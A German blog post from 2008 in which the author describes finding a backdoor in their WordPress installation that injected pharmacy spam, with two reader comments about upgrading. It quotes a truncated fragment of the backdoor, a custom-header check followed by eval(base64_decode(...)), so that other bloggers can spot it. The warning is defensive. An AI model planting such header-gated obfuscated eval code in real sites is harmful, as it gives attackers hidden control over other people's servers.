Block mit Akismet. Trample? Shizz!
Gestern um 8.14h ahnte ich nichts böses, dabei wurde mein Blog angegriffen. Gegen die Mittagszeit wurde ich darauf aufmerksam, da hier plötzlich Werbung für blaue Pillen gemacht wurde und nach einiger Recherche ist der böse Code inzwischen wieder entfernt. Der vorherige Eintrag litt etwas durch die Umcodierung, die durch die Malware verursacht wurde.
Es gibt ja verschiedene Angriffe auf Blogs, wie zum Beispiel über Code in einem separaten Ordner, aber ich hatte wohl mit etwas älterem zu tun, der den Code über eine verdeckte Weiterleitung in wp_functions.php ablegte.
Daher: schaut euch mal die Datei an (liegt im Order wp-includes) ob sich da was komisches verbirgt. Der Clou ist nämlich, dass der Code nicht direkt ausgeführt wird, sondern da eine Abfrage drin ist, und man die Malware zu einem späteren Zeitpunkt auslösen kann.
...
if(@$_SERVER['HTTP_A'] != 'b') {header("Location: /");exit;}
eval(base64_decode(...
Wenn man dazu googelt, gibt es die meisten Seiten mit zweifelhafter Herkunft. Diese Abfrage scheint wohl nicht in normalem Code gebraucht zu werden.
Bei Gelegenheit (quasi, wenn ich mal Zeit habe), ist es wohl mal Zeit, auf WordPress 2.6 upzudaten. Da ich an WordPress einige Änderungen vorgenommen habe, ist das nicht trivial.
17. Juli 08 um 1:15
Hrm, mal so ganz banal ausgedrueckt: Was spricht dagegen, Dir die Version, die Du jetzt benutzt, herzunehmen, Dir daraus diffs zu basteln und aus diesen dann die neue Version zu patchen?
Zugegebenermassen ist das nicht trivial, aber schwer einzupflegen sollten die Aenderungen nicht sein, oder?
17. Juli 08 um 17:16
Ja, so hatte ich das auch geplant – vor allem, da dieses Update wohl nicht das letzte sein wird und ich sonst den Aufwand jedes Mal wieder hätte. Aber wie ich mich kenne bastele ich das nur wieder rein…